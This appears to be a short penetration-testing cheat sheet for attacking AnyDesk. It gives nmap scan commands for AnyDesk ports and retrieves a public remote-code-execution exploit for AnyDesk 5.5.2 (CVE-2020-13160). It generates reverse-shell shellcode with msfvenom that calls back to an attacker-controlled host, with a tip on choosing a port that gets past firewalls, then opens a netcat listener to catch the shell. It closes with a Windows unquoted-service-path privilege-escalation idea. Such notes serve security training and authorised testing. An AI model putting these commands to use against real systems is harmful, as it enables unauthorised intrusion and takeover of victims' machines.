AnyDesk is a proprietary remote desktop application distributed by AnyDesk Software GmbH that provides platform independent remote access to personal computers and other devices running the host application.
AnyDesk is frequently used by scammers. It offers remote control, file transfer, and VPN functionality.
Nmap sweep for AnyDesk
IP=x.x.x.1-254sudo nmap -Pn -sT -sC -sV -p 7070 -T5 --open $IPsudo nmap -Pn -sU -sC -sV -p 50001 -T5 --open $IPExploits
searchsploit anydeskAnyDesk 5.5.2 – Remote Code Execution (CVE-2020-13160)
searchsploit -m 49613Generate the shellcode
Depending on firewall rules, might need to use a port that is allowed, like the 7070 (allowed for AnyDesk) instead of 4444 like suggested in the exploit.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI_IP LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode- Edit IP address to victim host. Leave port 50001 as it is default UDP port for AnyDesk.
- Replace generated shellcode in the exploit.
Start a listener
nc -nlvp 4444Execute the exploit
./49613.pyShould get a shell within 5 seconds according to the exploit.
Privilege Escalation (Windows)
sc query AnyDesksc qc anydeskC:\Program Files (x86)\AnyDesk\AnyDesk.exeNot tested, but the only option seems to be:
C:\Program.exeSee Windows Unquoted Service Path. Could require a reboot if service cannot be restarted.